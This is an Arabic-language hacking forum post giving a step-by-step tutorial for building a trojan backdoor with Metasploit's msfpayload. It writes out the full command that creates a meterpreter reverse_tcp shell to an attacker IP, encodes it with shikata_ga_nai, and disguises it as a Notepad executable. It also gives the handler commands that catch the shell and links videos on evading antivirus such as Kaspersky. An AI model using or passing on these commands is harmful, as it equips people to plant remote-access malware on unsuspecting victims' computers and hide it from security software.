1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : .:: RSS ::. | المشاهدات : 1,971 | الردود : 0
حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    بسم الله الرحمن الرحيم


    نبذة بسيطة عن طريقة عمل msfpayload لـصنع backdoor exe


    \
    /
    \
    /


    لتشغيل الاداة نطبق الأمر msfpayload

    [​IMG]


    -------------------


    طريقة العمل :

    [​IMG]


    الأمر المستخدم :


    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


    اجزاء مهم من الامر لزم نتعرف عليها ..

    msfpayload هو أمر تشغيل الاداة

    windows/meterpreter/reverse_tcp مسار ونوع الشل المستخدم

    LHOST=192.168.8.92 عنوان المستخدم ( attacker ip )

    LPORT=443 عنوان البورت ( port )


    -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


    نوع صيغة الملف والي هي EXE أسم الملف ومسار تخزين او حفظه /root/Desktop/NOTEPAD2.EXE


    تم تكوين NOTEPAD.EXE بنجاح ..


    ------------------------


    * عملية التصنت أو بالاصح handler


    طريق عمل handler بسيطه جـدا

    [​IMG]


    الاوامر المستخدمة :

    msf > use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST 192.168.8.92
    LHOST => 192.168.8.92

    msf exploit(handler) > set LPORT 443 LPORT => 443
    LPORT => 443

    msf exploit(handler) > exploit


    نتعرف على الاوامر بشكل سريع :


    use exploit/multi/handler لستخدام الـ handler

    set PAYLOAD windows/meterpreter/reverse_tcp لظبط الشل

    set LHOST 192.168.8.92 لظبط الايبي

    set LPORT 443 LPORT => 443 لظبط البورت

    exploit تنقيذ

    ----------------------


    الان نفتح ملف NOTEPAD.EXE


    [​IMG]


    تم الأستغلال بنجاح ..



    ---------------------------------------------------------------


    شــروحات عامـة ( video )


    شرح طريقة الاختراق بواسطة ip خارجي من خوينا الأيماراتي j0k3rr :

    أظغط هنا



    شرح استعمال ( no-ip )

    أظغط هنا



    شرح طريقة التشفير بواسطة ( Vanish Script )

    أظغط هنا



    شرح طريقة التفشير عن كاسبر سكاي 2012

    أظغط هنا



    شرح التفشير بـأستخدام أداة PEscrambler

    أظغط هنا



    شرح للي مافهم 1 |11|

    اظغط هنا



    شرح للي مافهم 2 |11|
    اظغط هنا



    دعواتكم ,,
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة